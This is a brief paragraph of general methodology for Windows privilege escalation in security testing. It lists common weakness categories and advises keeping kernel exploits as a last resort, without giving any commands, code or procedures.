Windows privilege escalation rewards methodical enumeration. The most reliable paths usually come from stored credentials, token privileges, weak service permissions, and registry or scheduled task misconfigurations. Kernel exploits should be saved for cases where safer, more deterministic paths have been exhausted.